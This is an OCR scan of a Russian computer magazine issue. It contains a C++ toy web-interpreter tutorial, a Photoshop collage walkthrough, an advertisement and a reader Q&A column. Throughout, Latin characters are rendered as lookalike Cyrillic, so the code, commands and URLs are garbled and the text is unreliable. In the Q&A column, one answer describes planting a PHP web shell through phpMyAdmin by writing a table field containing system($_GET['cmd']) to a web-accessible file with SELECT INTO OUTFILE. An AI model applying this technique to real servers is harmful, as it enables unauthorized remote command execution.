пользуемся классом іізігеат, который стал 
доступен, когда ты подключил хидер іізігеат 
в самом начале нашего интерпретатора. Со- 
три все содержимое функции таіп, кроме 
последней строки, и введи следующее: 

іізігеат Тіп; 

// создаем объект Ііп класса йзігеат. 
Ііп.ореп(агдѵ[1]): 

// читаем исходный код нашей программы 
сНагЬіЛ[80]; 

// создаем буфер для чтения из файла 
ѵѵіпііе (йп.деІІіпефіД 80)) 

{ // читаем построчно файл 

//здесь будет происходить обработка 
// исходного кода нашего скрипта 

} 

Наш интерпретатор будет построчно чи- 
тать файл и как-нибудь его интерпретиро- 
вать. Реализовать построчную интерпре- 
тацию куда проще, чем хитрые многопро- 
ходные системы. Давай теперь придумаем 
синтаксис нашего ѵѵеЬ-языка. Придумаем и 
тотчас реализуем. 

Начнем, пожалуй, с комментариев, без ко- 
торых никуда. Будем игнорировать всякую 
строку, начинающуюся символом #. Для 
этого добавляем в главный цикл соответс- 
твующую (кстати, всего одну) строку: 

гГ (ЬиІ[0] == "#" II зігІеп(ЬіЛ) == 0) сопііпие; 

Смысл у нее простой: если первый символ 
считываемого буфера является символом 
# или размер буфера считываемой строки 
нулевой (то есть она пуста), тогда мы выпол- 
няем сопііпие. Ключевое слово сопііпие оз- 
начает завершение текущего шага цикла и 
переход к следующему. Так-с, идем дальше. 
Для удобной отладки скриптов я решил 
ввести в интерпретатор счетчик строк, ука- 
зывающий на текущую читаемую строку. С 
его помощью, если вдруг в скрипте ошибка, 
можно всегда точно определить, где она на- 
ходится. Реализует он все это дело элемен- 
тарно. Объявляется переменная Ііпе перед 
циклом: 

іпі Ііпе = 0; 

И в самом начале цикла мы эту переменную 
увеличиваем на единицу: 

++Ііпе; 

Она нам еще пригодится. 

Далее я решил, что все переменные в моем 
языке не будут иметь четкой типизации, то 
есть не будут четко делиться на строковые, 
числовые и т.п. Для их хранения потребует- 
ся описать структуру. Предлагаю такую: 



зігисі ту_{уре 

{ 

сМаг сІі[30]; // имя переменной 

сіпаг пт[255]; //значение переменной 

}; 



Оетѵег — собранный русскими 
умельцами веб-сервера АрасЬе . 
Имеет встроенную базу данных 
Му8С)Ь, поддержку регі и рЬр . 

В него входят комплект самых 
необходимых в работе скриптов, 
таких как рЬртуасІтіп. Незаме- 
нимая вещь, когда нужно быстро 
собрать и привести в боевую 
готовность сервак. Очень удоб- 
ная установка. «Джентльменский 
набор ѴѴЪЪ-разработчика» — так 
прозвали сіешѵег. Все настройки 
АрасЬе хранятся по адресу: / 
іі8г /Іосаі /арасЬе / согД /ЬпрсІ. 
сопВ, а настройки РНР по адресу: 
/шг/ІосаІ/рЬр/рЬрлпі При 
установке программа спросит 
у тебя всего 3 ( ! ) вещи: место 
на диске, где будут храниться 
все файлы и папки АрасЬе, имя 
виртуального диска и метод уста- 
новки. Достаточно нажать всего 
пару клавиш — и веб-сервер 
готов к работе. Качать тут: 

Ьпр:/ /\ѵ\ѵ\ѵ.с1еітѵѵег.ги/ 



Копия такой структуры хранит название од- 
ной переменной и ее значение. Чтобы была 
возможность хранить большее количество 
таких переменных, нужно описать массив 
подобного типа. Делается это так: 

плуДуре ѵагз[999]; // массив структур туДуре 
іп{ѵагз_соип{ = 0; //количество элементов 

Так мы и будем хранить все переменные. 
Все очень просто. Чтобы ты понял, к чему 
я стремлюсь, я заранее приведу пример 
скрипта для нашего ѵѵеЬ-языка. Надеюсь, 
синтаксис у тебя не вызовет вопросов. 

#!/изг/ЫпДезІ 

# адрес интерпретатора 
ргадта = Лгзі 

# название программы 
ѵаг 

# описание всех переменных после слова ѵаг 

# переменная = значение 
Іезіі = 0 

1езі2 = 0 

# зіагі сообщает нам о начале кода 
зіагі 

# числовые операции 
ІезЛ = 9 

1ез12 = ІезЛ 

зЮр 

# после слова зіор код вообще не читается 

Так будут выглядеть все описанные на на- 
шем языке программы. Для того чтобы это 
реализовать, нам потребуются дополни- 
тельные, не очень сложные функции. Их 
прототипы приведены ниже, а полный их 
код ты найдешь на диске. 

зІгДо_іпІ(сИаг*зіг); 

// преобразовывает строку в число 
ехі{_еггог(сІіаг * еггог, іпі Ііпе); 

// выводит сообщение об ошибке кода 
туДуре деі_ѵагз(сІіаг* зотеѵаг); 

// возвращает структуру переменных 
// из строки вида «переменная = значение» 

ЬооІ Ііке(сІлаг * зігі , сНаг * з!г2); 

//сравнивает две строки 
ѵоіб 5Ілоѵѵ_ѵаг(сІлаг * ѵаг); 

// выводит значение переменной на экран 

Распознавание кода 

Для того чтобы скрипт читался правильно, 
предлагаю ввести переменную іпі зіер, ко- 
торая бы показывала, на каком шаге вы- 
полнения сейчас находится наш код. Я ввел 
такую зависимость выполнения отзначения 
переменной: 

0 — поиск названия программы; 

1 — поиск слова ѵаг; 

2 — получение переменных и поиск слова зіагі; 

3 — выполнение кода и поиск слова зіор; 



Язык наш очень строгий. Любое наруше- 
ние правил влечет за собой сообщение об 
ошибке. Неверный порядок команд ведет 
к тому же. Поэтому постараемся быть ак- 
куратнее и не нарушать созданные нами 
правила. 

Итак, поехали. Начнем описывать реакцию 
интерпретатора на те или иные команды. 
Например, код вывода значения перемен- 
ной на экран (команда зЬоѵѵ): 



Такая легкая конструкция приводит к очень 
красивому результату. Далее все команды 
будут находиться и выполняться посредс- 
твом функции Ііке. Следуя этому принципу, 
я придумал следующие математические 
операции: 

ріизѵагі ѵаг2 равносильно ѵагі =ѵаг1 +ѵаг2 
тіпизѵагі ѵаг2 равносильно ѵагі =ѵаг1 -ѵаг2 
тиШѵагІ ѵаг2 равносильно ѵагі =ѵаг1 *ѵаг2 
зііагеѵагі ѵаг2 равносильно ѵагі =ѵаг1 /ѵаг2 

Мы можем добавить даже работу с Му50І_. 
Можно в наш язык добавить поддержку цик- 
лов и, вообще, чего только душа пожелает. 
Но в данном примере я решил оставить 



іДІіке("зИоѵѵ", ЬиЩ 
{ //если найдена команда зНоѵѵ 
ту_{уре Ы = деі_ѵагз(ЬіТ); 

// получаем структуру из текста 
// вида "зИоѵѵ = ѵаг" 
зІпоѵѵ_ѵаг(ЬТсІп); 

//выводим на экран 
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СООІЫО 




/1/ Эепѵѵег 

страничка на локальном серваке 

/2/ 50 Кб 

исходный код нашего интерпретатора 



только одну очень важную команду, без ко- 
торой действительно не обойтись — это ІТ. 
Шаблон у нее будет такой: 

ІТ ѵагі ѵаг2 
#соттапсІ 

Принцип работы очень простой. Интер- 
претатор находит команду іі, затем, если 
переменная ѵагі равняется переменной 
ѵаг2, выполняет команду, записанную в 
следующей строке. А если они не равны, 
то команду он попросту игнорирует. Реа- 
лизация проста, зато невероятно полезна. 
Например, точное сравнение строк можно 
произвести посредством трех функций: 
Ііке, зігзігизігіеп. 

После условия можно ввести уже не такую 
необходимую, но все равно очень полез- 
ную команду, которая выводила бы содер- 
жимое текстового файла, так как писать 
весь ИітІ-код в самой программе — это 
слишком. Команде я дал название геасі. 
Прототип такой: 

геасі = ѵагі 

Найдя эту команду, интерпретатор открыва- 
ет содержимое файла, записанного в ѵагі , 
и выводит его нам на экран посимвольно. 
Реализуется команда несложно. В массиве 
структур находится именно та переменная, 
которая носит имя ѵагі . 

Получается ее значение. Далее нами со- 
здается объект класса іізігеат, с помощью 
которого читается файл и производится его 
посимвольный вывод. 

Используя такой движок, можно придумать 
любые команды. Главное — фантазию 
иметь. 



Выжимаем из него все 

Основау нас есть и, по-моему, неплохая. Те- 
перь можно приступить к написанию собс- 
твенного сайта на нашем языке. Идея сайта 
простенькая. Имеется домашняя страница. 
В ней 3 раздела: «контакты», «о себе» и 
«главная». Вся реализация — водном фай- 
ле. То есть, для того чтобы выполнить заду- 
манное, нам придется работать с какой-то 
переменной. Брать мы ее будем из адреса 
посредством команды деГ Также у сайта 
будет верхушка (файл Юр. Іхі), содержимое 
которой будет считываться на экран. Ниже 
приведен исходный код реализованной и 
вполне рабочей странички: 

#!/изг/Ьіп/сМ 

# пример использования нашего веб-языка 

# название программы 
ргадта = ЯгзІ 

# описание переменных 

ѵаг # блок переменных 

зесііопі = таіп 

зес1іоп2 = абоиі 

зесІіопЗ = сопіасі 

Тііеі = таіп.М 

ЯІе2 = аЬоиГМ 

ЯІеЗ = сопІасГМ 

Юр = Юр. 1x1: 

Ііпкз = Ііпкз. 1x1 
ЬоІЮт = Ьоііот.іхі 
1тр = етр1у 
етр = 

# зіагі - начало программы 
зіагі 

# читаем файл, записанный в переменной Юр 
геаб = Юр 

# читаем файл, записанный в переменной Ііпкз 
геасі = Ііпкз 

# получаем главную переменную 
деіітр 1 

# если она пуста, 
ііітретр 



#то выводим сообщение 

зііоѵѵ = '<сеп1ег> выберите, пожалуйста, раздел 

</сеп1ег>' 

іііплрзесііопі 

геасі = 1іІе1 

і11трзес1іоп2 
геасі = ТіІе2 

іІІплрзесІіопЗ 
геасі = ТіІеЗ 
зіор 

Пример работы ты можешь увидеть на ск- 
риншоте. Это пример использования самой 
простой реализации нашего языка. Думаю, 
ты понял, что можно использовать ИітІ-код, 
который украсит все наши работы. Одна 
переменная может менять содержимое 
сайта, и одна наша страничка становится 
динамической. Между прочим, такую техно- 
логию можно будет использовать для смены 
шаблона. 

Выводы 

Если тебе сервак или хостер разрешит 
повесить свой бинарник в систему, то ты 
можешь использовать собственные ѵѵеЬ- 
проекты, разработанные так, как тебе 
удобно. Не всегда следует делать «каквсе». 
Иногда нужно выделиться из толпы. К тому 
же использование популярных вещей — это 
просто небезопасно, □: 

3 

/Ііоте/ІосаІІіозі — рутовая директория 
нашего ѵѵеіэ-сервера, то есть именно 
отсюда будет черпать информацию 
пользователь, забравшийся браузером 
наІосаІИозГ 
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Лицензия ЗАО «Интерфакс-ТВ» 



ПОКУПАЕМ 




В ТЕЛЕПРОГРАММЕ 

КАПИТАЛ 

5 КРУПНЫХ БИЗНЕСМЕНОВ 
ПОКУПАЮТ ХОРОШИЕ ИДЕИ 



А У ВАС ЕСТЬ ХОРОШАЯ ИДЕЯ? 
ГОЕА@ТМТ-ТѴ. ВЦ 

С 14 МАЯ 90' 

каждое воскресенье I 









Дерек Бэкон работает со множеством журналов и газет, издаваемых по 
всему миру, и создает иллюстрации для клиентов, связанных с рекламным 
и издательским делом. В свободное от создания коллажей и съемки время, 
Эегек коллекционирует музыку. Дополнительную информацию о нем можно 
получить по адресу ѵѵѵѵѵѵ.іІІизІгаІіопѵѵеЬ.сот/бегекЬасоп и на его личном 
сайте ѵѵѵѵѵѵ.бегекЬасоп.сот. 



ДЕРЕК БЭКОН 




Резідп / 0 




Для начала воспроизведем из элементов фотог- 
рафии заранее придуманный набросок, если че- 
го-то не хватает - будем это фотографировать 
по мере составления коллажа. В этом коллаже 
использовалось немало снимков из коллекции 
(их можно учитывать при составлении предвари- 
тельного наброска), но кое-что было доснято от- 
дельно. Начнем, пожалуй, с руки, которая дер- 
жит огрызок. 



Открываем файл Напс1_арр1е.ірд, аккуратно вы- 
резаем руку из фона и переносим ее в файл 
ВаскдгоипсДрд. Теперь выбираем Ітаде > 
Афзітепіз > Ние/Заіигайоп и делаем фотогра- 
фию руки черно-белой. Настроим значение пара- 
метра Ехрозиге инструмента Вигп — 30%, нам 
нужна кисть с размытыми краями. С помощью 
этого инструмента мы собираемся сделать руку 
контрастнее, затемнив некоторые области. Чтобы 
рука приобрела естественный оттенок, выбираем 
Ітаде > Афизітепіз > Соіог Ваіапсе и при помо- 
щи движков настраиваем желаемый оттенок. 




Скопируем слой с рукой и снова уменьшим его 
насыщенность. Воспользуемся фильтром АсІсІ 
ІЧоізе, отметив следующие значения: Атоипі — 
9%, ОізІгіЬиІіоп — Оаиззіап, и поставив галочку 
напротив Мопосбготаііс. Далее воспользуемся 
функцией Ітаде > Афизітепіз > Розіегіге со 
значением 5. Инструментом Мадіс ѴѴапб (зна- 
чение Тоіегапсе — 6) выделим самый темный 
участок тени и выберем Зеіесі > Зеіесі Зітііаг, 
что позволит автоматически выделить темные 
области с тем же уровнем контрастности. 
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Не снимая выделения, создадим новый слой 



и зальем выделение градиентом содержащим 
переход от красного к черному, задав направ- 
ление примерно 45°. Теперь предыдущий слой 
можно удалить. Кликнем, удерживая <СігІ>, 
на оригинальном слое с рукой на панели І_ауегз, 
чтобы появилось выделение руки. Инвертиру- 
ем выделение (Зеіесі > Іпѵегзе) и, сделав 
активным слой с градиентом, нажимаем 
<ОеІеІе>. Таким образом мы удалили все 
лишнее, и рука выглядит достаточно опрятно. 







Разобравшись с рукой и яблоком, соединим все 
слои «скрепкой» и создадим набор слоев, 
кликнув по черной стрелки в углу панели І_ауегз 
и выбрав Ыеѵѵ (Згоир Ргот І_ауегз. Назовем эту 
группу ІіапсІ апб арріе. 




Похожие области мы можем создать и на 



крышке. Две из них будут иметь переходы от 
черного к белому, а одна - от белого к черному. 
Немного уменьшим значения непрозрачности 
этих слоев, чтобы под ними слегка проступало 
оригинальное фото крышки, а также добавим 
контуры, чтобы подчеркнуть ее форму. 




Инструментом Егазег с большого диаметра 
с размытыми краями и непрозрачностью 30% 
немного сотрем некоторые области сделанного 
градиента, чтобы он более аккуратно сливался 
с рукой. Чтобы подчеркнуть границы пальцев 
и усилить ощущение стилизации, нарисуем 
инструментом Реп контуры по краю руки 
и раскрасим их в цвета, которые возьмем 
с самой руки или фона. 



Для того чтобы придать огрызку стилизованный 
вид, промежуточный между фото и рисунком, 
проделаем с ним примерно те же операции. 

То есть уберем все детали, характерные для 
фотографии, и оставим только основные фор- 
мы и цвета. Закрасим левую и нижнюю части 
фрукта градиентами, образцы цвета для кото- 
рых возьмем непосредственно с яблока. Прой- 
демся кое-где ластиком и немного повернем 
нижнюю часть яблока. 



щ 




| НАЧИНАЕМ РАБОТУ С УРНОЙ 



Если мы хотим создать коллаж, который будет 
интересен и в цветовом, и в композиционном 
плане, то этот фрагмент изображения лучше 
обработать как небольшой самостоятельный 
рисунок... Открываем снимок урны (Віп.ірд) 
и крышки (Віп_1іб.ірд). Аккуратно их вырезаем 
и вставляем под группу слоев с яблоком и ру- 
кой. Крышку мы решили немного наклонить. 




ІТИГЛОБАПИЗМ 

Закрасим красивым красным цветом банку от 
«Колы», чтобы скрыть лого (они не оплатили 
нам еще прошлый рекламный месяц). Чтобы 
подчеркнуть форму предметов, создадим тонкие 
цветные контуры, по тому же принципу, по кото- 
рому мы действовали в шаге 6. Сделаем цвет 
банок насыщеннее, чтобы металл заблестел. 




Нам захотелось сделать урну чуть более «ме- 
таллической» — попробуем дорисовать обод 
самостоятельно. Создадим округлое выделе- 
ние и на слое, который мы поместим под слой 
с урной, закрасим это выделение черно-белым 
градиентом. Вот он и «металлический» блеск. 




Чтобы мусор в корзине не выглядел «приклеен- 
ным» будем создавать иллюзию глубины, добав- 
ляя на объекты тени. Чтобы тени выглядели ес- 
тественными, воспользуемся не кистью, а соз- 
дав инструментом Реп контуры, которые затем 
преобразуем в выделение, либо при помощи 
Сигѵез, либо при помощи инструмента Вигп сде- 
лаем выделенные участки темнее. Проделаем 
эти действия для всех предметов, будем сле- 
дить, чтобы тени падали в одном направлении. 
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ДИЗАЙН 




} ПРИСТУПАЕМ К ХОЗЯЙКЕ 

Женщина на иллюстрации - результат монтажа 
четырех различных снимков. С первого были 
взяты только голова, шея и грудь; со второго - 
руки, юбка и ноги; с третьего - лицо; 
и четвертого - прихватка в руках. Начнем 
с файла Сагоііпе.ірд. Отделим фигуру от фона 
(голову и шею можно не трогать) и расположим 
ее рядом с изображением руки. Возможно 
придется поработать инструментом Тгапзіопті, 
чтобы состыковать фрагменты удачно. 




1 идеальные ножки 

На оригинальной фотографии видно, 
что левая нога женщины обрезана. Чтобы это 
исправить, скопируем правую ступню, отразим 
(РІір Ногігопіаі) и расположим поверх левой 
ноги. Теперь сотрем ластиком с размытыми 
краями все лишнее и получим две совершенно 
одинаковых ноги. 



п 




ЯРКИЙ НАРЯД 



Теперь, мы разобрались с прихваткой и воло- 
сами, можно добавить цвет на другие участки. 
Цвет кожи обработаем таким же образом, ка- 
ким мы обработали руку в шаге 2. Для того же, 
чтобы майка выглядела по-настоящему яркой, 
сдвинем цветовой баланс в сторону ярко-розо- 
вого. Кстати, это видно невооруженным глазом, 
что лицо гораздо более контрастно, чем плечи 
и руки. Повысим их контраст, сделав светлые 
участки еще светлее инструментом Оосіде, 
а темные - еще темнее инструментом Вигп. 




Г МЕНЯЕМ УЗОР ЮБКИ 

Во время съемок Каролина одела какую-то 
ужасную юбку. Пусть она и домохозяйка, 
но не до такой же степени! Откроем файл 
файла Огазз.ірд, нажмем <СігІ>+<А> и скопи- 
руем все его содержимое. Теперь создадим 
выделение по контуру юбки и выберем в меню 
Есііі > Разіе Іпіо. Возможно, нам также потре- 
буется дополнительная обработка инструмен- 
том Тгапзіогт, после чего уменьшим насыщен- 
ность при помощи Ние/Заіигаііоп. 



» 

(прикручиваем голову 

Дл^о работки фигуры мужчины (файл 
тап.ірд), применим все те же самые методы, 
с помощью которых мы создали яркий образ 
домохозяйки-Каролины. В случае с мужчиной 
мы также заменим ему лицо, 
воспользовавшись файлом Воп.ірд. 





(не прибегая к помощи фильтра Моііоп ВІиг), 
выделим все его слои на панели І_ауегз, удер- 
живая <5ЫЯ>, после чего склеим. Скопировав 
этот слой, выберем ТгапзТогт и сожмем фигуру 
с обеих сторон, как показано на рисунке. 




Откроем Оѵепдіоѵез.ірд и, вырезав прихватку, 
перетащим ее на нашу иллюстрацию. 

Отделим прихватку от фона и расположим прямо 
перед женщиной. Аккуратно выделим клетчатые 
участки и при помощи инструмента Огасііепі сде- 
лаем их желтыми и коричневыми - цвета возь- 
мем с оригинального изображения. Для большей 
естественности некоторые квадратики можно 
стереть. Теперь таким же образом раскрасим 
остальные участки прихватки, делая акцент на 
контрасте. Наша задача заключается в том, что- 
бы не проглядывал ни один из элементов фото. 
Таким же образом заново нарисуем волосы. 




Используя команду Соіог Ваіапсе и другие 
средства корректировки цвета, подол можно 
сделать пурпурным. В завершение добавим 
таким же образом на юбку складки, используя 
различные части травы с фото и немного 
другой ее оттенок. Чтобы подчеркнуть фигуру 
девушки и сделать линии мягче, нарисуем по 
контуру каждого объекта яркие линии, 
закрасив их подходящим цветом. 




Закончив с этим, нажмем <Еп1ег>. А теперь 
снова выбрав Тгапз^огт растянем нашего 
«дистрофика», в результате чего получим 
необходимый эффект. 
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Убедившись, что этот слой находится позади 
мужчины, уменьшим значение параметра 
Орасііу на 25% и сотрем ту часть «движения», 
которая находится перед мужчиной. 




^Иработа с задним планом 

Чтобы сделать передний план более выразительным, сделаем задний план чуть более тусклым. 
Для начала применим к фоновому слою фильтр Оаиззіап ВІиг со значением Расііиз - 1 рх, затем 
добавим шума при помощи фильтра АсІсІ Ыоізе с отмеченными параметрами Оаиззіап и 
Мопосбготаііс, и значением Атоипі - 4%. При помощи Ние/Заіигаііоп изменим насыщенность 
(Заіигаііоп) фона на -10. Создадим новый слой поверх фона и зальем его от правого верхнего 
угла к левому нижнему к градиентом из синего в прозрачный, отметив непрозрачность этого слоя 
30%. Вот теперь передний план по-настоящему бьет в глаза! 




Все необходимые файлы, а также законченный коллаж в формате РЗй можно найти на диске. Файл с готовым изображением выложен 
для того, чтобы можно было оценить, что примерно должно получиться в итоге. 






РАО 



СТЕПАН ИЛЬИН АКА 5ТЕР 

/ РАО@КЕАІ..ХАКЕР.ГШ / 



Если использу- 
ешь спутниковый 
Интернет, то без 
ЕгІоЬах а или его 
аналога не обой- 
тись. Задержки 

в 300^500 мс без 
их использования 

сведут с ума кого 
угодно, честное 
слово 



Задавая вопрос, подумай! Не стоит мне посылать вопросы, так 
или иначе связанные с хаком/крэком/фриком — для этого есть 
Наск-Іац ( Наскіад@геаІ.хакер.пА не стоит также задавать откро- 
венно ламерские вопросы, ответ на которые ты при определен- 
ном желании можешь найти и сам. Я не телепат, поэтому конкре- 
тизируй вопрос, присылай как можно больше информации. 
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<^): Я использую спутниковый ускоритель СІоЬах. Сжимает тра- 
фик, уменьшает затраты и задержки — словом, настоящая находка. 
Одна лишь проблема: во время серфинга везде «светится» ІР-адрес 
СІоЬах-сервиса. Что делать, еслия хочу остаться анонимным? Как 
привязать внешний прокси-сервер? 

А: Если используешь спутниковый Интернет, то без (ЗІоЬах’а или 
его аналога не обойтись. Задержки в 300 — 500 мс без их исполь- 
зования сведут с ума кого угодно, честное слово. Для пользовате- 
ля подобный ускоритель обычно представляет собой локальный 
прокси-сервер. Тот же (ЗІоЬах работает в системе как сервис и слу- 
шает несколько портов на локальной машине. Чтобы задейство- 
вать ускоритель, юзер прописывает в браузере проксю 1 27.0.0. 1 , 
нужный порт — и радуется быстрому Интернету. Чтобы привязать 
внешний проксик, необходимо покопаться в текстовом конфиге 
программы. Обычно это файл дІоЬах.сопІ: 

[ІосаІ] 

гетоіе = діобах 
роП= 127.0.0.1:31337 
5егѵісе_іпІ = 0 

зегѵісе_ех{ = ІР-адрес анонимного прокси (его порт) 

Теперь на 31337 порту (ЗІоЬах будет слушать запросы и перена- 
правлять их на внешний прокси-сервер. Вот она — настоящая ано- 
нимность. 

(^: А вот еще проблема: прокси-серверы мрут как мухи. А каждый 
раз лазить в настройки браузера довольно утомительно. Подска- 
жи способ быстрого переключения между проксиками? 

А: Если ты пользуешься Іпіегпеі: Ехріогег’ом, то совет один — поме- 
няй браузер. Пускай это будет Аѵапі Вгоѵѵзег ( ѵѵѵѵѵѵ.аѵапШгоѵѵзег. 
сот ), построенный все на том же движке ІЕ. Ты разом получишь 
возможность быстро переключаться между проксиками, опера- 
тивно чистить кукисы и историю. Заядлым приверженцам ІЕ и тем 
несчастным, которые постоянно сидят за офисным компом, можно 
попробовать установить насадку-расширение — \ЮВапсІ ( ѵѵѵѵѵѵ. 
тѵІгееѵѵаге.пагоб.ги/ргобисІз/ѴРВапб.Ыт ). Сразу после установки 
в панели инструментов ослика появятся 4 небольших симпатичных 
кнопочки. Теперь для переключения прокси достаточно кликнуть на 
кнопку Ргоху Зегѵег и выбрать нужный сервер из списка (предвари- 
тельно обозначив их с помощью специального окошка Сизіотіге). 
Пользователям Рігеіох повезло значительно больше. Не даром этот 
браузер называют самым расширяемым — для него есть все. И 
такая мелочь, как быстрое переключение между проксями, не ис- 
ключение. Рекомендую аддон ЗѵѵіІсИРгоху ( Щэ://ех1епсІТІоск.сот/ 
беіаііз/зѵѵіісііргохѵ ). Вся установка сводится к нажатию на сайте 
кнопки «ІМЗТАИЗѵѵксІіРгоху». 

Самый универсальный вариант, который подойдет для пользовате- 
лей с любым браузером, — это программа А4Ргоху ( ѵѵѵѵѵѵ. іпеіргіѵасѵ. 
сот/а4ргохѵ ). По сути это локальный прокси-сервер (то есть для 
его использования в настройках браузера необходимо прописать 
1 27.0.0. 1 и порт, на котором работает программа), однако он имеет 
массу полезных в хозяйстве возможностей. Прокси из списка мож- 
но выбрать как вручную, так и автоматически. С ручной установкой 
все понятно (достаточно нескольких кликов мышью), а автомати- 
ческий выбор прокси вообще выглядит шикарно. Прога способна 
сама выбирать подходящие серверы по заданным критериям, исходя 
из результатов проверки «на вшивость» (да-да, поддерживается 
проверка на анонимность). 

(^): Второй год юзаю КПК на платформе РосксГРС. После того как 
потерял третью ТТ8В- флешку подряд, начал использовать его еще 
и в качестве контейнера для переноса файлов. Но тут проблема: 
если дома с подключением трудностей никаких не возникает (ус- 
тановлен Асііѵе8упс), то, например, в университете с этим облом. 
Может быть, есть способ сделать из него самую обыкновенную 
И8В- флешку? 



I 

После установки програм- 
мы Сага Ехрон II наладон- 
ник начнет эмулировать 
ШВ Ма88 8шга§е, а при 
подключении к компьюте- 
ру определится как самая 
обыкновенная флешка. 



I 



А: Легко. Об этом позаботились умель- 
цы из компании ЗоШіск ( ѵѵѵѵѵѵ.зоіііск. 
сот/сагсІехроі12/ ). После установки 
программы Сагб Ехрогі II наладонник 
начнет эмулировать ІІЗВ Мазз Зіогаде, 
а при подключении к компьютеру опре- 
делится как самая обыкновенная флешка. Воткнул — и новый диск 
ктвоим услугам. В качестве контейнера можно примонтировать как 
флешку, так и встроенную память РРС. Для выбора используется 
специальное меню программы. Кстати говоря, существует версия 
и для КПК на базе РаІтОЗ. 



(Д: Мне прислали программу. Кажется, это троян или вирус. Ис- 
следование дизассемблированного кода ни к чему не привело, но 
есть подозрение, что зловредные функции экспортируются из 
ОНЪ- библиотек. Каким образом можно выяснить зависимости? 
То есть определить, какие библиотеки используются и какие фун- 
кции экспортируются? 

А: На самом деле вспомогательных утилит предостаточно. Взять 
хотя бы прогу Оерепбепсу ѴѴаІкег ( ѵѵѵѵѵѵ.берепбепсѵѵѵаікег.сот ). 
Получив имя пациента (а им может быть ехе, сІІІ, осх, зуз и др.), тул- 
за немедленно обследует его и выдаст историю болезни. А заодно 
представит в виде дерева список всех его зависимостей. В этом 
дереве будет четко обозначено, какие функции и откуда экспор- 
тируются. Вдобавок для каждой ООІ_-библиотеки выдается мини- 
мальная информация: полный путь, адрес, версия и т.д. 

С): Как с помощью файла .Ьтассе$$ перенаправлять обычных посе- 
тителей на одну страницу, а админа — на другую. Распознавание 
осуществляется на уровне ІР- адресов. 

А: Показ разных страниц, в зависимости от ІР-адреса посетителя, 
реализуется следующим образом: 

5е1ЕпѵІ(РЕМОТЕ_АООР <нужный ІР-адрес> РЕОІР="гесІіг" 

ПеѵѵгіІеСопсІ %{РЕОІР} гесііг 
ПеѵѵгйеРиІе л /$/<нужная страница. НітІ> 



Например, перенаправление посетителей с ІР-адресом 86.1 10.163.2 
на страницу хакер. ИітІ: 

ЗеІЕпѵК РЕМОТЕ.АООР 86. 1 10. 1 63.2 РЕОІР="гебіг" 

ВеѵѵгіІеСопсІ %{РЕОІР} гесііг 
РеѵѵгіІеРиІе Л /$ /хакер. Н{тІ 



(^: Что такое пнрринг? 

А: Вырожденный случай пирринга — это двакомпа(например, Саши 
и Пети), соединенные СОМ-кабелем для обмена данными. Важный 
момент: ни Саша с Пети, ни Петя с Саши не получают никакой ма- 
териальной выгоды. То есть это не что иное, как прямое подклю- 
чение с халявным трафиком. В Интернете пирринг — это пример- 
но то же самое: обмен внутрисетевым трафиком между разными 
провайдерами. Допустим, есть два провинциальных провайдера: 
оба отдают свой трафик через магистрального оператора и пла- 
тят за это деньги! Но зачем передавать данные по столь длинному 
и, что еще хуже, накладному маршруту, если можно наладить пря- 
мой роутинг (пирринг) и передавать данные абсолютно бесплатно! 
Подобный подход успешно используется в ряде городов России. В 
Москве между крупнейшими операторами связи действуют по тем 
же правилам: с помощью общих узлов налаживается внутрисете- 
вой обмен, чтобы не пускать сетевые пакеты через границу. Таким 
образом, пирринг позволяет сделать ровно две вещи: сократить 
маршруты и расходы на передаче трафика. 

Есть доступ к скрипту рЬрМуАсІтіп на удаленном серваке. Ба- 
гов в этой версии скрипта нет, залить веб-шелл не получается, а 
выполнить команды на удаленном сервере очень хочется. Может 
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А: Для начала неплохо 
| Ш освоиться с рИрМуАсІтіп. 

ш Как известно, это популяр- 
’ ный (но при этом отнюдь не 
самый удобный) скрипт для 
управления Му80І_-базами 
данных. Этим фактом можно вос- 
пользоваться, но лишь с одним ус- 
ловием: ты должен найти директорию 
с правами на запись, причем в преде- 
лах ЭоситепІРооІ: (то есть доступная 
с ѵѵѵѵѵѵ). Дальше все просто. Создается 
в базе таблица с одним полем, в котором 
помещается до боли знакомая строка: 
<?зузІет($_ОЕТ['стсГ])?>. Делаем вывод 
поля в файл из созданной таблицы. Для этого формируем хитрый 
301-запрос: ЗЕ1_ЕСТ <название единственного поля таблицы> 
ЕРОМ <имя таблицы> ІІМТО ОІІТРНЕ '/путь_к_папкелоступной_для 
записи/іііе.рітр 1 . Воттебе и веб-шелл. 



г 



г 



г 



г 



Как наладить поддержку №ГР8 в различных операционных 
системах? 

А: В данный момент полноценная поддержка ІМТРЗ присутствует 
только в ОС семейства І\ІТ: ѴѴіпбоѵѵз ІМТ, 2000, ХР, 2003 Зегѵег. Для 
других систем придется устанавливать специальные средства. 
МЗ-ЭОЗ: существует специальный драйвер ІМТРЗЭОЗ ( ѵѵѵѵѵѵ. 
зѵзіпІегпаІз.сот/ІЛіІШез/ШзРоз.ІтІт ІГПоддерживаетчтениесІМТРЗ- 
разделов, а в случае профессиональной версии, — и запись. 
ѴѴіпбоѵѵз 9х: как вариант можно использовать аналог ІМТРЗЭОЗ 
от того же разработчика. Однако он поддерживает только чтение 
данных, хотя для записи можно использовать ЭОЗ’овский драйвер. 
Еще одно средство — драйвер Рагадоп ІМТРЗ Тог ѴѴіпбоѵѵз 98 (ѵѵѵѵѵѵ. 
рагадоп.ш ). поддерживающий как чтение, так и запись информации. 
1_іпих: разработка І_іпих-ІМТРЗ ( ѵѵѵѵѵѵ. Ііпих-пДз.огд ). включающая в 
себя модуль ядра и набор утилит для работы с файловыми систе- 
мами ІМТРЗ. Можно проверять целостность разделов, восстанавли- 
вать удаленные файлы и т.д. Этот драйвер по умолчанию включен в 
□пых еще с ядра версии 2.2. Модулем ядра поддерживается только 
чтение, но недавно в рамках проекта появилась утилита пйзтоипі, 
позволяющая монтировать ІМТРЗ-разделы на запись. Это первый 
полностью свободный продукт, имеющий такую возможность. 
Если возникнут проблемы, то можно попробовать использовать 
альтернативу — Рагадоп ІМТРЗ Тог І_іпих. Этот платный драйвер под- 
держивает чтение и запись, и вдобавок предоставляет несколько 
полезных утилит. 



Подскажи, пожалуйста, программу- дефрагментатор для файло- 
вой системы ехіЗ. Под винду софта — хотъ отбавляй. А для Линукса? 
А: Для начала разберемся с понятиями. Фрагментация — это про- 
цесс дробления данных на кусочки. Когда эти кусочки сильно раз- 
бросаны, жесткому диску приходится интенсивно позиционировать 
головку, чтобы прочитать каждый блок. Естественно, это влечет за 
собой снижение производительности и ресурса работы жесткого 
диска в целом. Поэтому, работая в винде, рекомендуется исполь- 
зовать дефрагментаторы, которые восстанавливают целостность 
